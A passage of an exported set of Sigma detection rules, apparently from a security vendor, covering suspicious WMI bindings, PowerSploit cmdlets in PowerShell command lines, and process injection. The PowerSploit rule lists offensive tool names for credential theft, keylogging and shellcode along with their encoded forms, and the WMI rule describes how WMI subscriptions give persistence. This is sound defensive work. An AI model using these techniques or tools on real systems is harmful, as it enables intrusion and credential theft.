"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ca2b9141-1490-4f8f-ba50-dae6d1126219",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076167Z",
"creation_date": "2026-03-23T11:45:34.076169Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076173Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html",
"https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
"https://attack.mitre.org/techniques/T1546/003/"
],
"name": "t1546_003_wmi_suspicious_binding.yml",
"content": "title: Suspicious WMI Binding\nid: ca2b9141-1490-4f8f-ba50-dae6d1126219\ndescription: |\n Detects the creation of suspicious WMI binding using a dangerous consumer.\n Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\n WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\n By default, two consumers class can be used maliciously:\n - ActiveScriptEventConsumer: execute the specified code or related script;\n - CommandLineEventConsumer: execute the specified command line.\n\n Consumer and filter parameter should be investigated to determine their legitimacy using for example the PowerShell cmdlet Get-WmiObject.\nreferences:\n - https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html\n - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\n - https://attack.mitre.org/techniques/T1546/003/\ndate: 2023/12/07\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.003\n - classification.Windows.Source.WmiEvent\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: wmi_event\ndetection:\n selection:\n EventType: 'WmiBindingEvent'\n Consumer|contains:\n - CommandLineEventConsumer\n - ActiveScriptEventConsumer\n Operation:\n - Created\n - Modified\n\n exclusion_hp:\n Filter:\n - '\\\\\\\\.\\root\\subscription:__EventFilter.Name=\"HP USB-C * G* Insertion Event Filter\"'\n - '\\\\\\\\.\\root\\subscription:__EventFilter.Name=\"HP USB-C&A Universal Dock G2 Insertion Event Filter\"'\n - '\\\\\\\\.\\root\\subscription:__EventFilter.Name=\"HP Thunderbolt * G* Insertion Event Filter\"'\n Consumer:\n - '\\\\\\\\.\\root\\subscription:CommandLineEventConsumer.Name=\"HP USB-C * G* Consumer\"'\n - '\\\\\\\\.\\root\\subscription:CommandLineEventConsumer.Name=\"HP USB-C&A Universal Dock G2 Consumer\"'\n - '\\\\\\\\.\\root\\subscription:CommandLineEventConsumer.Name=\"HP Thunderbolt * G* Consumer\"'\n\n exclusion_dell:\n Filter:\n - '\\\\\\\\.\\root\\subscription:__EventFilter.Name=\"DellCommandPowerManagerPolicyChangeEventFilter\"'\n - '\\\\\\\\.\\root\\subscription:__EventFilter.Name=\"DellCommandPowerManagerAlertEventFilter\"'\n Consumer:\n - '\\\\\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"DellCommandPowerManagerPolicyChangeEventConsumer\"'\n - '\\\\\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"DellCommandPowerManagerAlertEventConsumer\"'\n\n exclusion_default:\n Filter: '__EventFilter.Name=\"BVTFilter\"'\n Consumer: 'CommandLineEventConsumer.Name=\"BVTConsumer\"'\n\n exclusion_alsid:\n Filter: '__EventFilter.Name=?AlsidForAD-Launcher?'\n Consumer: 'ActiveScriptEventConsumer.Name=?AlsidForAD-Launcher?'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ca2b9141-1490-4f8f-ba50-dae6d1126219",
"rule_name": "Suspicious WMI Binding",
"rule_description": "Detects the creation of suspicious WMI binding using a dangerous consumer.\nAdversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\nBy default, two consumers class can be used maliciously:\n - ActiveScriptEventConsumer: execute the specified code or related script;\n - CommandLineEventConsumer: execute the specified command line.\n\nConsumer and filter parameter should be investigated to determine their legitimacy using for example the PowerShell cmdlet Get-WmiObject.\n",
"rule_creation_date": "2023-12-07",
"rule_modified_date": "2025-11-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ca528e6b-b852-41f1-b94c-82363027fb31",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595564Z",
"creation_date": "2026-03-23T11:45:34.595567Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595575Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/PowerShellMafia/PowerSploit",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0194/"
],
"name": "t1059_001_powershell_malicious_cmdlet_powersploit_cmd.yml",
"content": "title: Malicious PowerSploit Commandlets in Command-line\nid: ca528e6b-b852-41f1-b94c-82363027fb31\ndescription: |\n Detects various malicious cmdlets in PowerShell's command-line, generally associated with the PowerSploit framework.\n PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\n It is recommended to investigate actions performed by attackers using the PowerSploit framework and to isolate infected systems.\nreferences:\n - https://github.com/PowerShellMafia/PowerSploit\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0194/\ndate: 2021/06/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1134\n - attack.collection\n - attack.credential_access\n - attack.t1056.001\n - attack.execution\n - attack.t1047\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.005\n - attack.s0194\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerSploit\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmdlet:\n CommandLine|contains:\n # Set-MacAttribute, from PowerSploit\n - 'Set-MacAttribute'\n - 'UwBlAHQALQBNAGEAYwBBAHQAdAByAGkAYgB1AHQAZQ'\n - 'MAZQB0AC0ATQBhAGMAQQB0AHQAcgBpAGIAdQB0AGUA'\n - 'TAGUAdAAtAE0AYQBjAEEAdAB0AHIAaQBiAHUAdABlA'\n # Invoke-DllInjection, from PowerSploit\n - 'Invoke-DllInjection'\n - 'SQBuAHYAbwBrAGUALQBEAGwAbABJAG4AagBlAGMAdABpAG8Abg'\n - 'kAbgB2AG8AawBlAC0ARABsAGwASQBuAGoAZQBjAHQAaQBvAG4A'\n - 'JAG4AdgBvAGsAZQAtAEQAbABsAEkAbgBqAGUAYwB0AGkAbwBuA'\n # Invoke-Shellcode, from PowerSploit\n - 'Invoke-Shellcode'\n - 'SQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQ'\n - 'kAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUA'\n - 'JAG4AdgBvAGsAZQAtAFMAaABlAGwAbABjAG8AZABlA'\n # Invoke-WmiCommand, from PowerSploit\n - 'Invoke-WmiCommand'\n - 'SQBuAHYAbwBrAGUALQBXAG0AaQBDAG8AbQBtAGEAbgBkA'\n - 'kAbgB2AG8AawBlAC0AVwBtAGkAQwBvAG0AbQBhAG4AZA'\n - 'JAG4AdgBvAGsAZQAtAFcAbQBpAEMAbwBtAG0AYQBuAGQA'\n # Get-GPPPassword, from PowerSploit\n - 'Get-GPPPassword'\n - 'RwBlAHQALQBHAFAAUABQAGEAcwBzAHcAbwByAGQA'\n - 'cAZQB0AC0ARwBQAFAAUABhAHMAcwB3AG8AcgBkA'\n - 'HAGUAdAAtAEcAUABQAFAAYQBzAHMAdwBvAHIAZA'\n # Get-Keystrokes, from PowerSploit\n - 'Get-Keystrokes'\n - 'RwBlAHQALQBLAGUAeQBzAHQAcgBvAGsAZQBzA'\n - 'cAZQB0AC0ASwBlAHkAcwB0AHIAbwBrAGUAcw'\n - 'HAGUAdAAtAEsAZQB5AHMAdAByAG8AawBlAHMA'\n # Get-TimedScreenshot, from PowerSploit\n - 'Get-TimedScreenshot'\n - 'RwBlAHQALQBUAGkAbQBlAGQAUwBjAHIAZQBlAG4AcwBoAG8AdA'\n - 'cAZQB0AC0AVABpAG0AZQBkAFMAYwByAGUAZQBuAHMAaABvAHQA'\n - 'HAGUAdAAtAFQAaQBtAGUAZABTAGMAcgBlAGUAbgBzAGgAbwB0A'\n # Get-VaultCredential, from PowerSploit\n - 'Get-VaultCredential'\n - 'RwBlAHQALQBWAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbA'\n - 'cAZQB0AC0AVgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwA'\n - 'HAGUAdAAtAFYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsA'\n # Invoke-CredentialInjection, from PowerSploit\n - 'Invoke-CredentialInjection'\n - 'SQBuAHYAbwBrAGUALQBDAHIAZQBkAGUAbgB0AGkAYQBsAEkAbgBqAGUAYwB0AGkAbwBuA'\n - 'kAbgB2AG8AawBlAC0AQwByAGUAZABlAG4AdABpAGEAbABJAG4AagBlAGMAdABpAG8Abg'\n - 'JAG4AdgBvAGsAZQAtAEMAcgBlAGQAZQBuAHQAaQBhAGwASQBuAGoAZQBjAHQAaQBvAG4A'\n # Invoke-Mimikatz, from PowerSploit\n - 'Invoke-Mimikatz'\n - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA'\n - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A'\n - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg'\n # Invoke-NinjaCopy, from PowerSploit\n - 'Invoke-NinjaCopy'\n - 'SQBuAHYAbwBrAGUALQBOAGkAbgBqAGEAQwBvAHAAeQ'\n - 'kAbgB2AG8AawBlAC0ATgBpAG4AagBhAEMAbwBwAHkA'\n - 'JAG4AdgBvAGsAZQAtAE4AaQBuAGoAYQBDAG8AcAB5A'\n # Invoke-TokenManipulation, from PowerSploit\n - 'Invoke-TokenManipulation'\n - 'SQBuAHYAbwBrAGUALQBUAG8AawBlAG4ATQBhAG4AaQBwAHUAbABhAHQAaQBvAG4A'\n - 'kAbgB2AG8AawBlAC0AVABvAGsAZQBuAE0AYQBuAGkAcAB1AGwAYQB0AGkAbwBuA'\n - 'JAG4AdgBvAGsAZQAtAFQAbwBrAGUAbgBNAGEAbgBpAHAAdQBsAGEAdABpAG8Abg'\n # Out-Minidump, from PowerSploit\n - 'Out-Minidump'\n - 'TwB1AHQALQBNAGkAbgBpAGQAdQBtAHAA'\n - '8AdQB0AC0ATQBpAG4AaQBkAHUAbQBwA'\n - 'PAHUAdAAtAE0AaQBuAGkAZAB1AG0AcA'\n # Invoke-ReflectivePEInjection, from PowerSploit\n - 'Invoke-ReflectivePEInjection'\n - 'SQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8Abg'\n - 'kAbgB2AG8AawBlAC0AUgBlAGYAbABlAGMAdABpAHYAZQBQAEUASQBuAGoAZQBjAHQAaQBvAG4A'\n - 'JAG4AdgBvAGsAZQAtAFIAZQBmAGwAZQBjAHQAaQB2AGUAUABFAEkAbgBqAGUAYwB0AGkAbwBuA'\n # Invoke-UserHunter, from PowerSploit\n - 'Invoke-UserHunter'\n - 'SQBuAHYAbwBrAGUALQBVAHMAZQByAEgAdQBuAHQAZQByA'\n - 'kAbgB2AG8AawBlAC0AVQBzAGUAcgBIAHUAbgB0AGUAcg'\n - 'JAG4AdgBvAGsAZQAtAFUAcwBlAHIASAB1AG4AdABlAHIA'\n # Find-GPOLocation, from PowerSploit\n - 'Find-GPOLocation'\n - 'RgBpAG4AZAAtAEcAUABPAEwAbwBjAGEAdABpAG8Abg'\n - 'YAaQBuAGQALQBHAFAATwBMAG8AYwBhAHQAaQBvAG4A'\n - 'GAGkAbgBkAC0ARwBQAE8ATABvAGMAYQB0AGkAbwBuA'\n # Invoke-ACLScanner, from PowerSploit\n - 'Invoke-ACLScanner'\n - 'SQBuAHYAbwBrAGUALQBBAEMATABTAGMAYQBuAG4AZQByA'\n - 'kAbgB2AG8AawBlAC0AQQBDAEwAUwBjAGEAbgBuAGUAcg'\n - 'JAG4AdgBvAGsAZQAtAEEAQwBMAFMAYwBhAG4AbgBlAHIA'\n # Invoke-DowngradeAccount, from PowerSploit\n - 'Invoke-DowngradeAccount'\n - 'SQBuAHYAbwBrAGUALQBEAG8AdwBuAGcAcgBhAGQAZQBBAGMAYwBvAHUAbgB0A'\n - 'kAbgB2AG8AawBlAC0ARABvAHcAbgBnAHIAYQBkAGUAQQBjAGMAbwB1AG4AdA'\n - 'JAG4AdgBvAGsAZQAtAEQAbwB3AG4AZwByAGEAZABlAEEAYwBjAG8AdQBuAHQA'\n # Invoke-ServiceAbuse, from PowerSploit\n - 'Invoke-ServiceAbuse'\n - 'SQBuAHYAbwBrAGUALQBTAGUAcgB2AGkAYwBlAEEAYgB1AHMAZQ'\n - 'kAbgB2AG8AawBlAC0AUwBlAHIAdgBpAGMAZQBBAGIAdQBzAGUA'\n - 'JAG4AdgBvAGsAZQAtAFMAZQByAHYAaQBjAGUAQQBiAHUAcwBlA'\n # Install-SSP, from PowerSploit\n - 'Install-SSP'\n - 'SQBuAHMAdABhAGwAbAAtAFMAUwBQA'\n - 'kAbgBzAHQAYQBsAGwALQBTAFMAUA'\n - 'JAG4AcwB0AGEAbABsAC0AUwBTAFAA'\n # PowerBreach, from PowerSploit\n - 'PowerBreach'\n - 'UABvAHcAZQByAEIAcgBlAGEAYwBoA'\n - 'AAbwB3AGUAcgBCAHIAZQBhAGMAaA'\n - 'QAG8AdwBlAHIAQgByAGUAYQBjAGgA'\n # Get-SiteListPassword, from PowerSploit\n - 'Get-SiteListPassword'\n - 'RwBlAHQALQBTAGkAdABlAEwAaQBzAHQAUABhAHMAcwB3AG8AcgBkA'\n - 'cAZQB0AC0AUwBpAHQAZQBMAGkAcwB0AFAAYQBzAHMAdwBvAHIAZA'\n - 'HAGUAdAAtAFMAaQB0AGUATABpAHMAdABQAGEAcwBzAHcAbwByAGQA'\n # Invoke-WScriptBypass, from PowerSploit\n - 'Invoke-WScriptBypassUAC'\n - 'SQBuAHYAbwBrAGUALQBXAFMAYwByAGkAcAB0AEIAeQBwAGEAcwBzAFUAQQBDA'\n - 'kAbgB2AG8AawBlAC0AVwBTAGMAcgBpAHAAdABCAHkAcABhAHMAcwBVAEEAQw'\n - 'JAG4AdgBvAGsAZQAtAFcAUwBjAHIAaQBwAHQAQgB5AHAAYQBzAHMAVQBBAEMA'\n # Powerup, from PowerSploit\n - 'PowerUp'\n - 'UABvAHcAZQByAFUAcA'\n - 'AAbwB3AGUAcgBVAHAA'\n - 'QAG8AdwBlAHIAVQBwA'\n - 'Get-ServiceUnquoted'\n - 'RwBlAHQALQBTAGUAcgB2AGkAYwBlAFUAbgBxAHUAbwB0AGUAZA'\n - 'cAZQB0AC0AUwBlAHIAdgBpAGMAZQBVAG4AcQB1AG8AdABlAGQA'\n - 'HAGUAdAAtAFMAZQByAHYAaQBjAGUAVQBuAHEAdQBvAHQAZQBkA'\n - 'Get-ServiceFilePermission'\n - 'R2V0LVNlcnZpY2VGaWxlUGVybWlzc2lvb'\n - 'dldC1TZXJ2aWNlRmlsZVBlcm1pc3Npb2'\n - 'HZXQtU2VydmljZUZpbGVQZXJtaXNzaW9u'\n - 'Get-ServicePermission'\n - 'R2V0LVNlcnZpY2VQZXJtaXNzaW9u'\n - 'dldC1TZXJ2aWNlUGVybWlzc2lvb'\n - 'HZXQtU2VydmljZVBlcm1pc3Npb2'\n - 'Install-ServiceBinary'\n - 'SW5zdGFsbC1TZXJ2aWNlQmluYXJ5'\n - 'luc3RhbGwtU2VydmljZUJpbmFye'\n - 'JbnN0YWxsLVNlcnZpY2VCaW5hcn'\n - 'Find-DLLHijack'\n - 'RgBpAG4AZAAtAEQATABMAEgAaQBqAGEAYwBrA'\n - 'YAaQBuAGQALQBEAEwATABIAGkAagBhAGMAaw'\n - 'GAGkAbgBkAC0ARABMAEwASABpAGoAYQBjAGsA'\n - 'Find-PathHijack'\n - 'RgBpAG4AZAAtAFAAYQB0AGgASABpAGoAYQBjAGsA'\n - 'YAaQBuAGQALQBQAGEAdABoAEgAaQBqAGEAYwBrA'\n - 'GAGkAbgBkAC0AUABhAHQAaABIAGkAagBhAGMAaw'\n - 'Get-RegAlwaysInstallElevated'\n - 'RwBlAHQALQBSAGUAZwBBAGwAdwBhAHkAcwBJAG4AcwB0AGEAbABsAEUAbABlAHYAYQB0AGUAZA'\n - 'cAZQB0AC0AUgBlAGcAQQBsAHcAYQB5AHMASQBuAHMAdABhAGwAbABFAGwAZQB2AGEAdABlAGQA'\n - 'HAGUAdAAtAFIAZQBnAEEAbAB3AGEAeQBzAEkAbgBzAHQAYQBsAGwARQBsAGUAdgBhAHQAZQBkA'\n - 'Get-RegAutoLogon'\n - 'RwBlAHQALQBSAGUAZwBBAHUAdABvAEwAbwBnAG8Abg'\n - 'cAZQB0AC0AUgBlAGcAQQB1AHQAbwBMAG8AZwBvAG4A'\n - 'HAGUAdAAtAFIAZQBnAEEAdQB0AG8ATABvAGcAbwBuA'\n - 'Get-VulnAutoRun'\n - 'RwBlAHQALQBWAHUAbABuAEEAdQB0AG8AUgB1AG4A'\n - 'cAZQB0AC0AVgB1AGwAbgBBAHUAdABvAFIAdQBuA'\n - 'HAGUAdAAtAFYAdQBsAG4AQQB1AHQAbwBSAHUAbg'\n - 'Get-VulnSchTask'\n - 'RwBlAHQALQBWAHUAbABuAFMAYwBoAFQAYQBzAGsA'\n - 'cAZQB0AC0AVgB1AGwAbgBTAGMAaABUAGEAcwBrA'\n - 'HAGUAdAAtAFYAdQBsAG4AUwBjAGgAVABhAHMAaw'\n # PowerView, from PowerSploit\n - 'PowerView'\n - 'UABvAHcAZQByAFYAaQBlAHcA'\n - 'AAbwB3AGUAcgBWAGkAZQB3A'\n - 'QAG8AdwBlAHIAVgBpAGUAdw'\n # Invoke-PortScan, from PowerSploit\n - 'Invoke-PortScan'\n - 'SQBuAHYAbwBrAGUALQBQAG8AcgB0AFMAYwBhAG4A'\n - 'kAbgB2AG8AawBlAC0AUABvAHIAdABTAGMAYQBuA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwByAHQAUwBjAGEAbg'\n # Invoke-ReverseDNSLookup, from PowerSploit\n - 'Invoke-ReverseDNSLookup'\n - 'SQBuAHYAbwBrAGUALQBSAGUAdgBlAHIAcwBlAEQATgBTAEwAbwBvAGsAdQBwA'\n - 'kAbgB2AG8AawBlAC0AUgBlAHYAZQByAHMAZQBEAE4AUwBMAG8AbwBrAHUAcA'\n - 'JAG4AdgBvAGsAZQAtAFIAZQB2AGUAcgBzAGUARABOAFMATABvAG8AawB1AHAA'\n # Invoke-AllChecks, from PowerSploit\n - 'Invoke-AllChecks'\n - 'SQBuAHYAbwBrAGUALQBBAGwAbABDAGgAZQBjAGsAcw'\n - 'kAbgB2AG8AawBlAC0AQQBsAGwAQwBoAGUAYwBrAHMA'\n - 'JAG4AdgBvAGsAZQAtAEEAbABsAEMAaABlAGMAawBzA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ca528e6b-b852-41f1-b94c-82363027fb31",
"rule_name": "Malicious PowerSploit Commandlets in Command-line",
"rule_description": "Detects various malicious cmdlets in PowerShell's command-line, generally associated with the PowerSploit framework.\nPowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\nIt is recommended to investigate actions performed by attackers using the PowerSploit framework and to isolate infected systems.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1056.001",
"attack.t1059.001",
"attack.t1134",
"attack.t1547.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ca8123d8-d3c1-440a-985e-ecc31c2b39b8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076586Z",
"creation_date": "2026-03-23T11:45:34.076588Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076592Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_cobalt_process_access.yml",
"content": "title: Possible Process Injection from Unknown Module Detected\nid: ca8123d8-d3c1-440a-985e-ecc31c2b39b8\ndescription: |\n Detects an attempt to open a process with specific permissions associated with code injection, from an unknown module.\n These specific permissions allow an attacker to remotely write a shellcode and create a remote thread pointing to it.\n It is recommended to investigate the source process for suspicious activities.\n It is also recommended to check for injected threads in the target process.\nreferences:\n - https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2021/06/11\nmodified: 2025/04/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n # PROCESS_QUERY_LIMITED_INFORMATION\n # PROCESS_QUERY_INFORMATION\n # PROCESS_VM_WRITE\n # PROCESS_VM_READ\n # PROCESS_VM_OPERATION\n # PROCESS_CREATE_THREAD\n GrantedAccess: '0x143a'\n CallTrace|endswith: '|UNKNOWN(????????????????)'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_vs_code:\n ProcessOriginalFileName: 'electron.exe'\n ProcessInternalName: 'electron.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_vs_codium:\n ProcessOriginalFileName: 'electron.exe'\n ProcessInternalName: 'electron.exe'\n ProcessDescription: 'VSCodium'\n ProcessImage: '*\\VSCodium.exe' # C:\\Users\\xxxxx\\AppData\\Local\\Programs\\VSCodium\\VSCodium.exe / C:\\Users\\xxxx\\Documents\\Logiciels\\VSCodium-win32-x64-1.62.3\\VSCodium.exe\n\n exclusion_kaspersky:\n ProcessProcessName:\n - 'avp.exe'\n - 'ksde.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Kaspersky Lab'\n - 'Kaspersky Lab JSC'\n\n exclusion_vmware:\n # C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\n ProcessProcessName: 'vmtoolsd.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'VMware, Inc.'\n\n exclusion_azuredatastudio:\n # C:\\Program Files\\Azure Data Studio\\azuredatastudio.exe\n ProcessProcessName: 'azuredatastudio.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_riot_games_vanguard:\n # C:\\Program Files\\Riot Vanguard\\vgc.exe\n ProcessProcessName:\n - 'vgc.exe'\n - 'vgm.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Riot Games, Inc.'\n\n exclusion_winzip:\n ProcessProcessName: 'FAHWindow64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'WinZip Computing LLC'\n - 'WinZip Computing, S.L.'\n - 'Corel Corporation'\n\n exclusion_uipath:\n ProcessOriginalFileName:\n - 'UiExplorer.exe'\n - 'UiPath.Executor.exe'\n - 'UiPath.Executor.dll'\n - 'UiPath.Studio.Project.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'UiPath, Inc.'\n\n exclusion_git:\n ProcessParentImage:\n - '?:\\Program Files\\Git\\usr\\bin\\bash.exe'\n - '*\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n - '?:\\Program Files\\Git\\usr\\bin\\sh.exe'\n - '*\\AppData\\Local\\Programs\\Git\\usr\\bin\\sh.exe'\n\n exclusion_zoomtext:\n # C:\\Program Files (x86)\\Freedom Scientific\\ZoomText\\2019\\AiSquared.Magnification.ZoomText.exe\n ProcessOriginalFileName: 'AiSquared.Magnification.ZoomText.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Freedom Scientific Inc'\n\n exclusion_equ8_anticheat:\n ProcessOriginalFileName: 'anticheat.x??.equ8.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Int3 Software AB'\n\n exclusion_bitdefender_injection_64:\n # Ivanti seems to bundle BitDefender DLLs...\n CallTrace|startswith:\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(0000????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(0000????????????)'\n exclusion_bitdefender_injection_32:\n CallTrace|contains:\n - '|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(000000007???????)|'\n - '|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint 